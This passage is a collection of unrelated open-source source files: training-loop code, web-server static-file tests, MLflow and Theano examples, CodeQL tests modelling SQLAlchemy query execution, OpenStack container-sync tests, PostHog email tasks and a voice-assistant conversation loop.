log_file.write('{}, {}, {}, {}, {}, {}, {}, {}, {}, {}\n'.format(self._total_train_seconds, self._total_train_iterations, self._total_train_traces, loss, valid_loss, learning_rate_current, batch.mean_length_controlled, len(batch.sub_batches), bucket_id, traces_per_second))
if stop:
break
if (distributed_rank == 0) and log_file_name is not None:
log_file.close()
print()
if (distributed_rank == 0) and (save_file_name_prefix is not None):
file_name = '{}_{}_traces_{}.network'.format(save_file_name_prefix, util.get_time_stamp(), self._total_train_traces)
print('\rSaving to disk... ', end='\r')
self._save(file_name)
|
tests/single_file_test.py | tailhook/swindon | 104 | 11195641 | import os.path
def data_check(data, method, expected):
if method == "HEAD":
assert data == b''
else:
assert data == expected
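# For example, data_check(b'', 'HEAD', b'Static file test\n') passes because
# HEAD responses must carry an empty body, while for any other method the
# body has to equal the expected bytes.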
async def test_ok(swindon, get_request, static_request_method,
debug_routing, TESTS_DIR):
resp, data = await get_request(swindon.url / 'static-file')
assert resp.status == 200
assert resp.headers['Content-Type'] == 'text/plain'
assert resp.headers['Content-Length'] == '17'
data_check(data, static_request_method, b'Static file test\n')
if debug_routing:
assert resp.headers['X-Swindon-Route'] == 'single_file'
assert resp.headers['X-Swindon-File-Path'] == \
'"{}/assets/static_file.txt"'.format(TESTS_DIR)
else:
assert 'X-Swindon-Route' not in resp.headers
assert 'X-Swindon-File-Path' not in resp.headers
async def test_query_args(swindon, get_request, static_request_method,
debug_routing, TESTS_DIR):
url = swindon.url / 'static-file'
url = url.with_query(foo='bar')
resp, data = await get_request(url)
assert resp.status == 200
assert resp.headers['Content-Type'] == 'text/plain'
assert resp.headers['Content-Length'] == '17'
data_check(data, static_request_method, b'Static file test\n')
if debug_routing:
assert resp.headers['X-Swindon-Route'] == 'single_file'
assert resp.headers['X-Swindon-File-Path'] == \
'"{}/assets/static_file.txt"'.format(TESTS_DIR)
else:
assert 'X-Swindon-Route' not in resp.headers
assert 'X-Swindon-File-Path' not in resp.headers
async def test_request_method(swindon, get_request, static_request_method):
resp, data = await get_request(swindon.url / 'static-file')
assert resp.status == 200
assert resp.headers['Content-Type'] == 'text/plain'
assert resp.headers['Content-Length'] == '17'
data_check(data, static_request_method, b'Static file test\n')
async def test_missing_file(swindon, get_request, static_request_method,
debug_routing, TESTS_DIR):
msg = open(os.path.dirname(__file__) + '/404.html', 'rb').read()
resp, data = await get_request(swindon.url / 'missing-file')
assert resp.status == 404
data_check(data, static_request_method, msg)
assert resp.headers['Content-Type'] != 'text/is/missing'
assert resp.headers['Content-Length'] == str(len(msg))
if debug_routing:
assert resp.headers['X-Swindon-File-Path'] == \
'"{}/assets/missing_file.txt"'.format(TESTS_DIR)
async def test_permission(swindon, get_request, static_request_method):
msg = open(os.path.dirname(__file__) + '/403.html', 'rb').read()
resp, data = await get_request(swindon.url / 'no-permission')
assert resp.status == 403
data_check(data, static_request_method, msg)
assert resp.headers['Content-Type'] == 'text/html'
assert resp.headers['Content-Length'] == str(len(msg))
async def test_extra_headers(swindon, get_request, static_request_method):
resp, data = await get_request(swindon.url / 'static-file-headers')
assert resp.status == 200
assert resp.headers.getall('X-Extra-Header') == ['extra value']
assert 'X-Bad-Header' not in resp.headers
async def test_symlink(swindon, get_request, static_request_method,
debug_routing, TESTS_DIR):
resp, data = await get_request(swindon.url / 'symlink')
assert resp.status == 200
assert resp.headers['Content-Type'] == 'text/plain'
assert resp.headers['Content-Length'] == '17'
data_check(data, static_request_method, b'Static file test\n')
if debug_routing:
assert resp.headers['X-Swindon-Route'] == 'single_symlink'
assert resp.headers['X-Swindon-File-Path'] == \
'"{}/assets/link.txt"'.format(TESTS_DIR)
else:
assert 'X-Swindon-Route' not in resp.headers
assert 'X-Swindon-File-Path' not in resp.headers
async def test_non_file(swindon, get_request, static_request_method,
debug_routing):
msg = open(os.path.dirname(__file__) + '/403.html', 'rb').read()
resp, data = await get_request(swindon.url / 'dev-null')
assert resp.status == 403
assert resp.headers['Content-Type'] == 'text/html'
assert resp.headers['Content-Length'] == str(len(msg))
data_check(data, static_request_method, msg)
if debug_routing:
assert resp.headers['X-Swindon-Route'] == 'dev_null'
assert resp.headers['X-Swindon-File-Path'] == \
'"/dev/null"'
else:
assert 'X-Swindon-Route' not in resp.headers
assert 'X-Swindon-File-Path' not in resp.headers
|
examples/shap/binary_classification.py | PeterSulcs/mlflow | 10,351 | 11195659 | <gh_stars>1000+
import os
import numpy as np
from sklearn.datasets import load_breast_cancer
from sklearn.ensemble import RandomForestClassifier
import shap
import mlflow
from utils import to_pandas_Xy
# prepare training data
X, y = to_pandas_Xy(load_breast_cancer())
X = X.iloc[:50, :8]
y = y.iloc[:50]
# train a model
model = RandomForestClassifier()
model.fit(X, y)
# log an explanation
with mlflow.start_run() as run:
mlflow.shap.log_explanation(lambda X: model.predict_proba(X)[:, 1], X)
# list artifacts
client = mlflow.tracking.MlflowClient()
artifact_path = "model_explanations_shap"
artifacts = [x.path for x in client.list_artifacts(run.info.run_id, artifact_path)]
print("# artifacts:")
print(artifacts)
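# Illustrative output: the list should include entries such as
# "model_explanations_shap/base_values.npy" and
# "model_explanations_shap/shap_values.npy", which are downloaded and loaded
# back below.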
# load back the logged explanation
dst_path = client.download_artifacts(run.info.run_id, artifact_path)
base_values = np.load(os.path.join(dst_path, "base_values.npy"))
shap_values = np.load(os.path.join(dst_path, "shap_values.npy"))
# show a force plot
shap.force_plot(float(base_values), shap_values[0, :], X.iloc[0, :], matplotlib=True)
|
01_basics/01_building_expressions/03_tensor.py | johny-c/theano_exercises | 711 | 11195686 | # Fill in the TODOs in this exercise, then run
# python 03_tensor.py to see if your solution works!
import numpy as np
from theano import function
raise NotImplementedError("TODO: add any other imports you need")
def make_tensor(dim):
"""
Returns a new Theano tensor with no broadcastable dimensions.
dim: the total number of dimensions of the tensor.
(You can use any dtype you like)
"""
raise NotImplementedError("TODO: implement this function.")
def broadcasted_add(a, b):
"""
a: a 3D theano tensor
b: a 4D theano tensor
Returns c, a 4D theano tensor, where
c[i, j, k, l] = a[l, k, i] + b[i, j, k, l]
for all i, j, k, l
"""
raise NotImplementedError("TODO: implement this function.")
def partial_max(a):
"""
a: a 4D theano tensor
Returns b, a theano matrix, where
b[i, j] = max_{k,l} a[i, k, l, j]
for all i, j
"""
raise NotImplementedError("TODO: implement this function.")
if __name__ == "__main__":
a = make_tensor(3)
b = make_tensor(4)
c = broadcasted_add(a, b)
d = partial_max(c)
f = function([a, b,], d)
rng = np.random.RandomState([1, 2, 3])
a_value = rng.randn(2, 2, 2).astype(a.dtype)
b_value = rng.rand(2, 2, 2, 2).astype(b.dtype)
c_value = np.transpose(a_value, (2, 1, 0))[:, None, :, :] + b_value
expected = c_value.max(axis=1).max(axis=1)
actual = f(a_value, b_value)
assert np.allclose(actual, expected), (actual, expected)
print "SUCCESS!"
|
test_scripts/dependency-test/t1.py | clayne/ida-qscripts | 131 | 11195693 | <reponame>clayne/ida-qscripts
import os
import sys
subdir = os.path.join(os.path.dirname(__file__), 'subdir')
if subdir not in sys.path:
print("-->adding to path: %s" % subdir)
sys.path.append(subdir)
import datetime
import t2, t3, t4, t5
print("--- %s; this is %s.." % (datetime.datetime.now(), __file__))
t2.f2()
t3.f3()
t4.f4()
t5.f5() |
python/ql/test/library-tests/frameworks/sqlalchemy/new_tests.py | angie1148/codeql | 643 | 11195695 | import sqlalchemy
import sqlalchemy.orm
# SQLAlchemy is slowly migrating to a 2.0 version, and as part of 1.4 release have a 2.0
# style (forwards compatible) API that _can_ be adopted. So these tests are marked with
# either v1.4 or v2.0, such that we cover both.
raw_sql = "select 'FOO'"
text_sql = sqlalchemy.text(raw_sql) # $ constructedSql=raw_sql
Base = sqlalchemy.orm.declarative_base()
# ==============================================================================
# v1.4
# ==============================================================================
print("v1.4")
# Engine see https://docs.sqlalchemy.org/en/14/core/connections.html#sqlalchemy.engine.Engine
engine = sqlalchemy.create_engine("sqlite+pysqlite:///:memory:", echo=True)
result = engine.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
result = engine.execute(statement=raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
result = engine.execute(text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
scalar_result = engine.scalar(raw_sql) # $ getSql=raw_sql
assert scalar_result == "FOO"
scalar_result = engine.scalar(statement=raw_sql) # $ getSql=raw_sql
assert scalar_result == "FOO"
# engine with custom execution options
# see https://docs.sqlalchemy.org/en/14/core/connections.html#sqlalchemy.engine.Engine.execution_options
engine_with_custom_exe_opts = engine.execution_options(foo=42)
result = engine_with_custom_exe_opts.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
even_more_opts = engine_with_custom_exe_opts.execution_options(bar=43)
result = even_more_opts.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
# Connection see https://docs.sqlalchemy.org/en/14/core/connections.html#sqlalchemy.engine.Connection
conn = engine.connect()
conn: sqlalchemy.engine.base.Connection
result = conn.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
result = conn.execute(statement=raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
result = conn.execute(text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
result = conn.execute(statement=text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
# scalar
scalar_result = conn.scalar(raw_sql) # $ getSql=raw_sql
assert scalar_result == "FOO"
scalar_result = conn.scalar(object_=raw_sql) # $ getSql=raw_sql
assert scalar_result == "FOO"
scalar_result = conn.scalar(text_sql) # $ getSql=text_sql
assert scalar_result == "FOO"
scalar_result = conn.scalar(object_=text_sql) # $ getSql=text_sql
assert scalar_result == "FOO"
# exec_driver_sql
result = conn.exec_driver_sql(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
# construction by object
conn = sqlalchemy.engine.base.Connection(engine)
result = conn.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
# branched connection
branched_conn = conn.connect()
result = branched_conn.execute(text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
# raw connection
raw_conn = conn.connection
result = raw_conn.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
cursor = raw_conn.cursor()
cursor.execute(raw_sql) # $ getSql=raw_sql
assert cursor.fetchall() == [("FOO",)]
cursor.close()
raw_conn = engine.raw_connection()
result = raw_conn.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
# connection with custom execution options
conn_with_custom_exe_opts = conn.execution_options(bar=1337)
result = conn_with_custom_exe_opts.execute(text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
# Session -- is what you use to work with the ORM layer
# see https://docs.sqlalchemy.org/en/14/orm/session_basics.html
# and https://docs.sqlalchemy.org/en/14/orm/session_api.html#sqlalchemy.orm.Session
session = sqlalchemy.orm.Session(engine)
result = session.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
result = session.execute(statement=raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
result = session.execute(text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
result = session.execute(statement=text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
# scalar
scalar_result = session.scalar(raw_sql) # $ getSql=raw_sql
assert scalar_result == "FOO"
scalar_result = session.scalar(statement=raw_sql) # $ getSql=raw_sql
assert scalar_result == "FOO"
scalar_result = session.scalar(text_sql) # $ getSql=text_sql
assert scalar_result == "FOO"
scalar_result = session.scalar(statement=text_sql) # $ getSql=text_sql
assert scalar_result == "FOO"
# other ways to construct a session
with sqlalchemy.orm.Session(engine) as session:
result = session.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
Session = sqlalchemy.orm.sessionmaker(engine)
session = Session()
result = session.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
with Session() as session:
result = session.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
with Session.begin() as session:
result = session.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
# scoped_session
Session = sqlalchemy.orm.scoped_session(sqlalchemy.orm.sessionmaker(engine))
session = Session()
result = session.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
# Querying (1.4)
# see https://docs.sqlalchemy.org/en/14/orm/session_basics.html#querying-1-x-style
# to do so we first need a model
class For14(Base):
__tablename__ = "for14"
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
description = sqlalchemy.Column(sqlalchemy.String)
Base.metadata.create_all(engine)
# add a test-entry
test_entry = For14(id=14, description="test")
session = sqlalchemy.orm.Session(engine)
session.add(test_entry)
session.commit()
assert session.query(For14).all()[0].id == 14
# and now we can do the actual querying
text_foo = sqlalchemy.text("'FOO'") # $ constructedSql="'FOO'"
# filter_by is only vulnerable to injection if sqlalchemy.text is used, which is evident
# from the logs produced if this file is run
# that is, first filter_by results in the SQL
#
# SELECT for14.id AS for14_id, for14.description AS for14_description
# FROM for14
# WHERE for14.description = ?
#
# which is then called with the argument `'FOO'`
#
# and the second filter_by results in the SQL
#
# SELECT for14.id AS for14_id, for14.description AS for14_description
# FROM for14
# WHERE for14.description = 'FOO'
#
# which is then called without any arguments
assert session.query(For14).filter_by(description="'FOO'").all() == []
query = session.query(For14).filter_by(description=text_foo)
assert query.all() == []
# Initially I wanted to add lots of additional taint steps such that the normal SQL
# injection query would find these cases where an ORM query includes a TextClause that
# includes user-input directly... But that presented 2 problems:
#
# - which part of the query construction above should be marked as SQL to fit our
# `SqlExecution` concept. Nothing really fits this well, since all the SQL execution
# happens under the hood.
# - This would require a LOT of modeling for these additional taint steps, since there
# are many many constructs we would need to have models for. (see the 2 examples below)
#
# So instead we extended the SQL injection query to include TextClause construction as a
# sink directly.
# `filter` provides more general filtering
# see https://docs.sqlalchemy.org/en/14/orm/tutorial.html#common-filter-operators
# and https://docs.sqlalchemy.org/en/14/orm/query.html#sqlalchemy.orm.Query.filter
assert session.query(For14).filter(For14.description == "'FOO'").all() == []
query = session.query(For14).filter(For14.description == text_foo)
assert query.all() == []
assert session.query(For14).filter(For14.description.like("'FOO'")).all() == []
query = session.query(For14).filter(For14.description.like(text_foo))
assert query.all() == []
# There are many other possibilities for ending up with SQL injection, including the
# following (not an exhaustive list):
# - `where` (alias for `filter`)
# - `group_by`
# - `having`
# - `order_by`
# - `join`
# - `outerjoin`
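# For illustration only (not asserted in these tests): passing a TextClause to any
# of the methods above embeds the raw string in the generated SQL, e.g.
#
#   session.query(For14).order_by(sqlalchemy.text(user_input))
#
# where `user_input` stands for attacker-controlled data.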
# ==============================================================================
# v2.0
# ==============================================================================
import sqlalchemy.future
print("-"*80)
print("v2.0 style")
# For Engine, see https://docs.sqlalchemy.org/en/14/core/future.html#sqlalchemy.future.Engine
engine = sqlalchemy.create_engine("sqlite+pysqlite:///:memory:", echo=True, future=True)
future_engine = sqlalchemy.future.create_engine("sqlite+pysqlite:///:memory:", echo=True)
# in 2.0 you are not allowed to execute things directly on the engine
try:
engine.execute(raw_sql) # $ SPURIOUS: getSql=raw_sql
raise Exception("above not allowed in 2.0")
except NotImplementedError:
pass
try:
engine.execute(text_sql) # $ SPURIOUS: getSql=text_sql
raise Exception("above not allowed in 2.0")
except NotImplementedError:
pass
# `connect` returns a new Connection object.
# see https://docs.sqlalchemy.org/en/14/core/future.html#sqlalchemy.future.Connection
print("v2.0 engine.connect")
with engine.connect() as conn:
conn: sqlalchemy.future.Connection
# in 2.0 you are not allowed to use raw strings like this:
try:
conn.execute(raw_sql) # $ SPURIOUS: getSql=raw_sql
raise Exception("above not allowed in 2.0")
except sqlalchemy.exc.ObjectNotExecutableError:
pass
result = conn.execute(text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
result = conn.execute(statement=text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
result = conn.exec_driver_sql(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
raw_conn = conn.connection
result = raw_conn.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
# branching not allowed in 2.0
try:
branched_conn = conn.connect()
raise Exception("above not allowed in 2.0")
except NotImplementedError:
pass
# connection with custom execution options
conn_with_custom_exe_opts = conn.execution_options(bar=1337)
result = conn_with_custom_exe_opts.execute(text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
# `scalar` is shorthand helper
try:
conn.scalar(raw_sql) # $ SPURIOUS: getSql=raw_sql
except sqlalchemy.exc.ObjectNotExecutableError:
pass
scalar_result = conn.scalar(text_sql) # $ getSql=text_sql
assert scalar_result == "FOO"
scalar_result = conn.scalar(statement=text_sql) # $ getSql=text_sql
assert scalar_result == "FOO"
# This is a contrived example
select = sqlalchemy.select(sqlalchemy.text("'BAR'")) # $ constructedSql="'BAR'"
result = conn.execute(select) # $ getSql=select
assert result.fetchall() == [("BAR",)]
# This is a contrived example
select = sqlalchemy.select(sqlalchemy.literal_column("'BAZ'"))
result = conn.execute(select) # $ getSql=select
assert result.fetchall() == [("BAZ",)]
with future_engine.connect() as conn:
result = conn.execute(text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
# `begin` returns a new Connection object with a transaction begun.
print("v2.0 engine.begin")
with engine.begin() as conn:
result = conn.execute(text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
# construction by object
conn = sqlalchemy.future.Connection(engine)
result = conn.execute(text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
# raw_connection
raw_conn = engine.raw_connection()
result = raw_conn.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
cursor = raw_conn.cursor()
cursor.execute(raw_sql) # $ getSql=raw_sql
assert cursor.fetchall() == [("FOO",)]
cursor.close()
# Session (2.0)
session = sqlalchemy.orm.Session(engine, future=True)
result = session.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
result = session.execute(statement=raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
result = session.execute(text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
result = session.execute(statement=text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
# scalar
scalar_result = session.scalar(raw_sql) # $ getSql=raw_sql
assert scalar_result == "FOO"
scalar_result = session.scalar(statement=raw_sql) # $ getSql=raw_sql
assert scalar_result == "FOO"
scalar_result = session.scalar(text_sql) # $ getSql=text_sql
assert scalar_result == "FOO"
scalar_result = session.scalar(statement=text_sql) # $ getSql=text_sql
assert scalar_result == "FOO"
# Querying (2.0)
# uses a slightly different style than 1.4 -- see note about not modeling
# ORM query construction as SQL execution at the 1.4 query tests.
class For20(Base):
__tablename__ = "for20"
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
description = sqlalchemy.Column(sqlalchemy.String)
For20.metadata.create_all(engine)
# add a test-entry
test_entry = For20(id=20, description="test")
session = sqlalchemy.orm.Session(engine, future=True)
session.add(test_entry)
session.commit()
assert session.query(For20).all()[0].id == 20
# and now we can do the actual querying
# see https://docs.sqlalchemy.org/en/14/orm/session_basics.html#querying-2-0-style
statement = sqlalchemy.select(For20)
result = session.execute(statement) # $ getSql=statement
assert result.scalars().all()[0].id == 20
statement = sqlalchemy.select(For20).where(For20.description == text_foo)
result = session.execute(statement) # $ getSql=statement
assert result.scalars().all() == []
|
tempest/api/object_storage/test_container_sync.py | cityofships/tempest | 254 | 11195708 | <reponame>cityofships/tempest
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
from urllib import parse as urlparse
import testtools
from tempest.api.object_storage import base
from tempest import config
from tempest.lib.common.utils import data_utils
from tempest.lib import decorators
CONF = config.CONF
# This test can be quite long to run due to its
# dependency on the container-sync process's run interval.
# You can obviously reduce the container-sync interval in the
# container-server configuration.
class ContainerSyncTest(base.BaseObjectTest):
"""Test container synchronization"""
credentials = [['operator', CONF.object_storage.operator_role],
['operator_alt', CONF.object_storage.operator_role]]
@classmethod
def setup_credentials(cls):
super(ContainerSyncTest, cls).setup_credentials()
cls.os_alt = cls.os_roles_operator_alt
@classmethod
def setup_clients(cls):
super(ContainerSyncTest, cls).setup_clients()
cls.object_client_alt = cls.os_alt.object_client
cls.container_client_alt = cls.os_alt.container_client
@classmethod
def resource_setup(cls):
super(ContainerSyncTest, cls).resource_setup()
cls.containers = []
cls.objects = []
cls.clients = {}
# Default container-server config only allows localhost
cls.local_ip = '127.0.0.1'
cls.local_ip_v6 = '[::1]'
        # Must be configured according to the container-sync interval
container_sync_timeout = CONF.object_storage.container_sync_timeout
cls.container_sync_interval = \
CONF.object_storage.container_sync_interval
cls.attempts = \
int(container_sync_timeout / cls.container_sync_interval)
# define container and object clients
cls.clients[data_utils.rand_name(name='TestContainerSync')] = \
(cls.container_client, cls.object_client)
cls.clients[data_utils.rand_name(name='TestContainerSync')] = \
(cls.container_client_alt, cls.object_client_alt)
for cont_name, client in cls.clients.items():
client[0].create_container(cont_name)
cls.addClassResourceCleanup(base.delete_containers,
cont_name,
client[0],
client[1])
cls.containers.append(cont_name)
def _test_container_synchronization(self, make_headers):
# container to container synchronization
# to allow/accept sync requests to/from other accounts
# turn container synchronization on and create object in container
for cont in (self.containers, self.containers[::-1]):
cont_client = [self.clients[c][0] for c in cont]
obj_client = [self.clients[c][1] for c in cont]
headers = make_headers(cont[1], cont_client[1])
cont_client[0].put(str(cont[0]), body=None, headers=headers)
# create object in container
object_name = data_utils.rand_name(name='TestSyncObject')
data = object_name[::-1].encode() # Raw data, we need bytes
obj_client[0].create_object(cont[0], object_name, data)
self.objects.append(object_name)
# wait until container contents list is not empty
cont_client = [self.clients[c][0] for c in self.containers]
params = {'format': 'json'}
while self.attempts > 0:
object_lists = []
for c_client, cont in zip(cont_client, self.containers):
resp, object_list = c_client.list_container_objects(
cont, params=params)
object_lists.append(dict(
(obj['name'], obj) for obj in object_list))
# check that containers are not empty and have equal keys()
# or wait for next attempt
if object_lists[0] and object_lists[1] and \
set(object_lists[0].keys()) == set(object_lists[1].keys()):
break
else:
time.sleep(self.container_sync_interval)
self.attempts -= 1
self.assertEqual(object_lists[0], object_lists[1],
'Different object lists in containers.')
# Verify object content
obj_clients = [(self.clients[c][1], c) for c in self.containers]
for obj_client, cont in obj_clients:
for obj_name in object_lists[0]:
resp, object_content = obj_client.get_object(cont, obj_name)
self.assertEqual(object_content, obj_name[::-1].encode())
@decorators.attr(type='slow')
@decorators.unstable_test(bug='1317133')
@decorators.idempotent_id('be008325-1bba-4925-b7dd-93b58f22ce9b')
@testtools.skipIf(
not CONF.object_storage_feature_enabled.container_sync,
'Old-style container sync function is disabled')
def test_container_synchronization(self):
"""Test container synchronization"""
def make_headers(cont, cont_client):
# tell first container to synchronize to a second
            # use rsplit with a maxsplit of 1 to ensure ipv6 addresses are
# handled properly as well
client_proxy_ip = urlparse.urlparse(
cont_client.base_url).netloc.rsplit(':', 1)[0]
if client_proxy_ip.startswith("["): # lazy check
client_base_url = \
cont_client.base_url.replace(client_proxy_ip,
self.local_ip_v6)
else:
client_base_url = \
cont_client.base_url.replace(client_proxy_ip,
self.local_ip)
headers = {'X-Container-Sync-Key': 'sync_key',
'X-Container-Sync-To': "%s/%s" %
(client_base_url, str(cont))}
return headers
self._test_container_synchronization(make_headers)
|
posthog/tasks/email.py | csmatar/posthog | 7,409 | 11195724 | import datetime
import logging
from typing import Optional
from posthog.celery import app
from posthog.email import EmailMessage, is_email_available
from posthog.models import Event, Organization, OrganizationInvite, PersonDistinctId, Team, User, organization
from posthog.templatetags.posthog_filters import compact_number
from posthog.utils import get_previous_week
logger = logging.getLogger(__name__)
def send_weekly_email_reports() -> None:
"""
Schedules an async task to send the weekly email report for each team.
"""
if not is_email_available():
logger.info("Skipping send_weekly_email_report because email is not properly configured")
return
for team in Team.objects.order_by("pk"):
_send_weekly_email_report_for_team.delay(team_id=team.pk)
@app.task(ignore_result=True, max_retries=1)
def _send_weekly_email_report_for_team(team_id: int) -> None:
"""
Sends the weekly email report to all users in a team.
"""
period_start, period_end = get_previous_week()
last_week_start: datetime.datetime = period_start - datetime.timedelta(7)
last_week_end: datetime.datetime = period_end - datetime.timedelta(7)
campaign_key: str = f"weekly_report_for_team_{team_id}_on_{period_start.strftime('%Y-%m-%d')}"
team = Team.objects.get(pk=team_id)
event_data_set = Event.objects.filter(team=team, timestamp__gte=period_start, timestamp__lte=period_end,)
active_users = PersonDistinctId.objects.filter(
distinct_id__in=event_data_set.values("distinct_id").distinct(),
).distinct()
active_users_count: int = active_users.count()
if active_users_count == 0:
# TODO: Send an email prompting fix to no active users
return
last_week_users = PersonDistinctId.objects.filter(
distinct_id__in=Event.objects.filter(team=team, timestamp__gte=last_week_start, timestamp__lte=last_week_end,)
.values("distinct_id")
.distinct(),
).distinct()
last_week_users_count: int = last_week_users.count()
two_weeks_ago_users = PersonDistinctId.objects.filter(
distinct_id__in=Event.objects.filter(
team=team,
timestamp__gte=last_week_start - datetime.timedelta(7),
timestamp__lte=last_week_end - datetime.timedelta(7),
)
.values("distinct_id")
.distinct(),
).distinct() # used to compute delta in churned users
two_weeks_ago_users_count: int = two_weeks_ago_users.count()
not_last_week_users = PersonDistinctId.objects.filter(
pk__in=active_users.difference(last_week_users,).values_list("pk", flat=True,)
) # users that were present this week but not last week
churned_count = last_week_users.difference(active_users).count()
churned_ratio: Optional[float] = (churned_count / last_week_users_count if last_week_users_count > 0 else None)
last_week_churn_ratio: Optional[float] = (
two_weeks_ago_users.difference(last_week_users).count() / two_weeks_ago_users_count
if two_weeks_ago_users_count > 0
else None
)
churned_delta: Optional[float] = (
churned_ratio / last_week_churn_ratio - 1 if last_week_churn_ratio else None # type: ignore
)
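    # churned_delta is the relative week-over-week change in the churn ratio
    # (e.g. 0.25 means churn was 25% higher than the previous week); it stays
    # None whenever the previous week's churn ratio is unavailable or zero.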
message = EmailMessage(
campaign_key=campaign_key,
subject=f"PostHog weekly report for {period_start.strftime('%b %d, %Y')} to {period_end.strftime('%b %d')}",
template_name="weekly_report",
template_context={
"preheader": f"Your PostHog weekly report is ready! Your team had {compact_number(active_users_count)} active users last week! 🎉",
"team": team.name,
"period_start": period_start,
"period_end": period_end,
"active_users": active_users_count,
"active_users_delta": active_users_count / last_week_users_count - 1 if last_week_users_count > 0 else None,
"user_distribution": {
"new": not_last_week_users.filter(person__created_at__gte=period_start).count() / active_users_count,
"retained": active_users.intersection(last_week_users).count() / active_users_count,
"resurrected": not_last_week_users.filter(person__created_at__lt=period_start).count()
/ active_users_count,
},
"churned_users": {"abs": churned_count, "ratio": churned_ratio, "delta": churned_delta},
},
)
for user in team.organization.members.all():
# TODO: Skip "unsubscribed" users
message.add_recipient(email=user.email, name=user.first_name)
message.send()
@app.task(max_retries=1)
def send_invite(invite_id: str) -> None:
campaign_key: str = f"invite_email_{invite_id}"
invite: OrganizationInvite = OrganizationInvite.objects.select_related("created_by", "organization").get(
id=invite_id
)
message = EmailMessage(
campaign_key=campaign_key,
subject=f"{invite.created_by.first_name} invited you to join {invite.organization.name} on PostHog",
template_name="invite",
template_context={"invite": invite},
reply_to=invite.created_by.email if invite.created_by and invite.created_by.email else "",
)
message.add_recipient(email=invite.target_email)
message.send()
@app.task(max_retries=1)
def send_member_join(invitee_uuid: str, organization_id: str) -> None:
invitee: User = User.objects.get(uuid=invitee_uuid)
organization: Organization = Organization.objects.get(id=organization_id)
campaign_key: str = f"member_join_email_org_{organization_id}_user_{invitee_uuid}"
message = EmailMessage(
campaign_key=campaign_key,
subject=f"{invitee.first_name} joined you on PostHog",
template_name="member_join",
template_context={"invitee": invitee, "organization": organization},
)
# Don't send this email to the new member themselves
members_to_email = organization.members.exclude(email=invitee.email)
if members_to_email:
for user in members_to_email:
message.add_recipient(email=user.email, name=user.first_name)
message.send()
|
client/conversation.py | kelvinhammond/jasper-client | 3,771 | 11195735 | <reponame>kelvinhammond/jasper-client<filename>client/conversation.py<gh_stars>1000+
# -*- coding: utf-8-*-
import logging
from notifier import Notifier
from brain import Brain
class Conversation(object):
def __init__(self, persona, mic, profile):
self._logger = logging.getLogger(__name__)
self.persona = persona
self.mic = mic
self.profile = profile
self.brain = Brain(mic, profile)
self.notifier = Notifier(profile)
def handleForever(self):
"""
Delegates user input to the handling function when activated.
"""
self._logger.info("Starting to handle conversation with keyword '%s'.",
self.persona)
while True:
# Print notifications until empty
notifications = self.notifier.getAllNotifications()
for notif in notifications:
self._logger.info("Received notification: '%s'", str(notif))
self._logger.debug("Started listening for keyword '%s'",
self.persona)
threshold, transcribed = self.mic.passiveListen(self.persona)
self._logger.debug("Stopped listening for keyword '%s'",
self.persona)
if not transcribed or not threshold:
self._logger.info("Nothing has been said or transcribed.")
continue
self._logger.info("Keyword '%s' has been said!", self.persona)
self._logger.debug("Started to listen actively with threshold: %r",
threshold)
input = self.mic.activeListenToAllOptions(threshold)
self._logger.debug("Stopped to listen actively with threshold: %r",
threshold)
if input:
self.brain.query(input)
else:
self.mic.say("Pardon?")
|
runtests.py | stefanor/pystemmer | 192 | 11195746 | #!/usr/bin/env python
import doctest
import sys
py3k = sys.version_info >= (3, 0)
if py3k:
